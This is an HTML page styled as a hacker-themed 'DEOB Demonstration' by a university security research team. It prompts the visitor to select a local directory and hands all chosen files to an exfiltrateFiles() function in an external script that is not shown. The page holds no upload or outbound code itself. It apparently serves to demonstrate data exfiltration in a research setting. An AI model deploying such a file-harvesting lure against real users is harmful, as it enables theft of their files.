<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>⚡️ DEOB Demonstration by Science Tokyo Cybersecurity Research Team ⚡️</title>

  <!-- Bootstrap 4 CDN -->
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.2/dist/css/bootstrap.min.css" rel="stylesheet">
  
  <!-- Google Fonts for a Modern Hacker Style -->
  <link href="https://fonts.googleapis.com/css2?family=Orbitron&display=swap" rel="stylesheet">

  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    body {
      background-color: #121212;
      color: #00FF00;
      font-family: 'Orbitron', sans-serif;
      height: 100vh;
      overflow: hidden;
      position: relative;
      display: flex;
      justify-content: center;
      align-items: center;
      text-align: center;
      flex-direction: column;
      animation: flicker 0.5s infinite;
    }

    h1 {
      font-size: 3rem;
      letter-spacing: 3px;
      text-shadow: 0 0 15px #00ff00, 0 0 25px #00ff00, 0 0 35px #00ff00;
      animation: glitch 1.5s infinite;
      color: #1E90FF;
      background: linear-gradient(90deg, rgba(0,255,0,1) 0%, rgba(0,128,0,1) 100%);
      background-clip: text;
    }

    @keyframes flicker {
      0% { opacity: 1; }
      50% { opacity: 0.5; }
      100% { opacity: 1; }
    }

    @keyframes glitch {
      0% {
        transform: translate(2px, 0) skew(0deg);
      }
      25% {
        transform: translate(-2px, 0) skew(0deg);
      }
      50% {
        transform: translate(2px, 0) skew(0deg);
      }
      75% {
        transform: translate(-2px, 0) skew(0deg);
      }
      100% {
        transform: translate(2px, 0) skew(0deg);
      }
    }

    #startExfiltration {
      padding: 15px 35px;
      border: 2px solid #FF4500;
      background-color: transparent;
      color: #FF4500;
      font-size: 1.5rem;
      letter-spacing: 2px;
      cursor: pointer;
      transition: all 0.3s ease-in-out;
      border-radius: 5px;
      margin-top: 20px;
      box-shadow: 0 0 15px #FF4500, 0 0 25px #FF4500;
    }

    #startExfiltration:hover {
      background-color: #FF4500;
      color: #000;
      transform: scale(1.1);
      box-shadow: 0 0 35px #FF4500, 0 0 50px #FF4500;
    }

    .pulse-effect {
      animation: pulse 2s infinite;
      color: #FF4500;
    }

    @keyframes pulse {
      0% {
        transform: scale(1);
        opacity: 1;
      }
      50% {
        transform: scale(1.1);
        opacity: 0.5;
      }
      100% {
        transform: scale(1);
        opacity: 1;
      }
    }

    .binary-rain {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      z-index: -1;
      pointer-events: none;
      display: flex;
      flex-direction: column;
      justify-content: center;
      align-items: center;
      opacity: 0.9;
    }

    .rain-column {
      font-size: 2rem;
      color: #00FF00;
      opacity: 0.7;
      animation: fall 4s linear infinite;
    }

    @keyframes fall {
      0% { transform: translateY(-100vh); }
      100% { transform: translateY(100vh); }
    }

    .terminal-text {
      font-size: 1.5rem;
      margin-top: 20px;
      color: #00FF00;
      opacity: 0;
      animation: terminal-blink 1s step-end infinite;
    }

    @keyframes terminal-blink {
      50% {
        opacity: 1;
      }
      100% {
        opacity: 0;
      }
    }

    .burst {
      animation: burst 2s ease-out infinite;
      font-size: 2rem;
      color: #FF4500;
      position: absolute;
      top: 10%;
      left: 50%;
      transform: translateX(-50%);
      opacity: 0;
      z-index: 9999;
    }

    @keyframes burst {
      0% { opacity: 0; transform: translateY(0) scale(0.5); }
      50% { opacity: 1; transform: translateY(-50px) scale(1.5); }
      100% { opacity: 0; transform: translateY(0) scale(0.5); }
    }

    .glass-effect {
      backdrop-filter: blur(10px);
      background-color: rgba(0, 0, 0, 0.7);
      padding: 20px;
      border-radius: 10px;
      box-shadow: 0 0 20px rgba(0, 255, 0, 0.5);
    }
  </style>
</head>
<body>

  <div class="glass-effect">
    <h1 class="pulse-effect">⚡️ DEOB Demonstration by Science Tokyo Cybersecurity Research Team ⚡️</h1>
    
    <!-- Directory selection button -->
    <input type="file" id="fileInput" webkitdirectory multiple style="display: none;"/>
    <button id="startExfiltration" class="btn btn-outline-light">Select Directory & Start Extraction</button>
    
    <div class="terminal-text">Initializing System... ⌛</div>
  </div>

  <div class="burst">!EXFILTRATION IN PROGRESS!</div>

  <div class="binary-rain">
    <div class="rain-column">01010101</div>
    <div class="rain-column">11010010</div>
    <div class="rain-column">00101010</div>
    <div class="rain-column">01100011</div>
    <div class="rain-column">10101001</div>
    <div class="rain-column">11001100</div>
    <div class="rain-column">10101011</div>
  </div>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script src="eob.js"></script> <!-- External JS for Exfiltration Logic -->

  <script>
    $(document).ready(function() {
      // Trigger file input when the button is clicked
      $('#startExfiltration').on('click', function() {
        $('#fileInput').click(); // Open the file dialog

        // Handle the file selection
        $('#fileInput').on('change', function(event) {
          if (event.target.files.length > 0) {
            // Simulate exfiltration process
            $('.terminal-text').fadeIn().html('Data Exfiltration in Progress... 💀');
            $('.burst').fadeIn();
            setTimeout(() => {
              $('.burst').fadeOut();
            }, 2000);

            // Execute eob.js or its logic after directory selection
            // Call the function or execute the script from eob.js as necessary
            // Example:
            exfiltrateFiles(event.target.files); // Assuming exfiltrateFiles is a function in eob.js
          } else {
            $('.terminal-text').fadeIn().html('No files selected.');
          }
        });
      });

      // Add random binary rain burst effect at intervals
      setInterval(() => {
        let rainColumn = $('<div class="rain-column">');
        rainColumn.text(Math.random().toString(2).slice(2, 10)); // Random binary string
        $('.binary-rain').append(rainColumn);
        setTimeout(() => {
          rainColumn.remove();
        }, 4000); // Remove after falling
      }, 300); // Slower addition of new binary rain elements
    });
  </script>

</body>
</html>
